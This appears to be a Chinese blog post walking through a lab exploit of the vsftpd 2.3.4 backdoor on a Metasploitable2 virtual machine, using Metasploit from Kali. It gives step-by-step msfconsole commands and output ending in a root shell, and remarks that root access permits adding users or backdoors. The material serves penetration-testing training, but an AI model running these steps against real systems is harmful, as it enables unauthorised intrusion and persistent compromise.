zoukankan      html  css  js  c++  java
  • metasploit2

    一、环境说明

    目标IP: 本人虚拟机 192.168.80.134 ,使用 metasploit2

    攻击IP: 本人虚拟机 192.168.80.129 ,使用 kali

    Metasploitable2 虚拟系统是一个特别制作的ubuntu操作系统,本身设计作为安全工具测试和演示常见漏洞攻击。版本2已经可以下载,并且比上一个版本包含更多可利用的安全漏洞。这个版本的虚拟系统兼容VMware,VirtualBox,和其他虚拟平台。默认只开启一个网络适配器并且开启NAT和Host-only,本镜像一定不要暴漏在一个易受攻击的网络中。

    Metasploitable2默认用户名:msfadmin、密码:msfadmin.

    二、攻击过程

    1、启动,这个启动过程有点久,毕竟两台虚拟机同时跑,机器有点顶不住

    root@kali:~# msfconsole
    # cowsay++
    ____________
    < metasploit >
    ------------
    ,__,
    (oo)____
    (__) )
    ||--|| *

    =[ metasploit v4.17.17-dev ]
    + -- --=[ 1817 exploits - 1031 auxiliary - 315 post ]
    + -- --=[ 539 payloads - 42 encoders - 10 nops ]
    + -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

    2、寻找漏洞代码 (vsftpd),如果对方机器被扫描出  vsftpd 这种漏洞存在
    msf > search vsftpd
    [!] Module database cache not built yet, using slow search

    Matching Modules
    ================

    Name Disclosure Date Rank Description
    ---- --------------- ---- -----------
    exploit/unix/ftp/vsftpd_234_backdoor 2011-07-03 excellent VSFTPD v2.3.4 Backdoor Command Execution

    3、在 VSFTPD v2.3.4  这个版本下有漏洞可以利用
    msf > use exploit/unix/ftp/vsftpd_234_backdoor

    4、显示payloads
    msf exploit(unix/ftp/vsftpd_234_backdoor) > show payloads

    Compatible Payloads
    ===================

    Name Disclosure Date Rank Description
    ---- --------------- ---- -----------
    cmd/unix/interact normal Unix Command, Interact with Established Connection

    5、设置
    msf exploit(unix/ftp/vsftpd_234_backdoor) > set payload cmd/unix/interact
    payload => cmd/unix/interact

    6、查看参数
    msf exploit(unix/ftp/vsftpd_234_backdoor) > show options

    7、设置目标IP 

    msf exploit(unix/ftp/vsftpd_234_backdoor) > set rhost 192.168.80.134
    rhost => 192.168.80.134
    msf exploit(unix/ftp/vsftpd_234_backdoor) > show options

    Module options (exploit/unix/ftp/vsftpd_234_backdoor):

    Name Current Setting Required Description
    ---- --------------- -------- -----------
    RHOST 192.168.80.134 yes The target address
    RPORT 21 yes The target port (TCP)

    Payload options (cmd/unix/interact):

    Name Current Setting Required Description
    ---- --------------- -------- -----------

    Exploit target:

    Id Name
    -- ----
    0 Automatic

    8、开始溢出攻击

    msf exploit(unix/ftp/vsftpd_234_backdoor) > exploit

    [*] 192.168.80.134:21 - Banner: 220 (vsFTPd 2.3.4)
    [*] 192.168.80.134:21 - USER: 331 Please specify the password.
    [+] 192.168.80.134:21 - Backdoor service has been spawned, handling...
    [+] 192.168.80.134:21 - UID: uid=0(root) gid=0(root)

    [*] Found shell.
    [*] Command shell session 1 opened (192.168.80.129:39981 -> 192.168.80.134:6200) at 2019-07-08 00:38:52 +0800

    如上,得到一个反弹shell ,获取到 root 权限,得到root权限已经可以干任何事情了,比如建用户、留后门。

  • 相关阅读:
    Java JMX 监管
    Spring Boot REST(一)核心接口
    JSR 规范目录
    【平衡树】宠物收养所 HNOI 2004
    【树型DP】叶子的颜色 OUROJ 1698
    【匈牙利匹配】无题II HDU2236
    【贪心】Communication System POJ 1018
    【贪心】Moving Tables POJ 1083
    Calling Extraterrestrial Intelligence Again POJ 1411
    【贪心】Allowance POJ 3040
  • 原文地址:https://www.cnblogs.com/micfox/p/11148995.html
Copyright © 2011-2022 走看看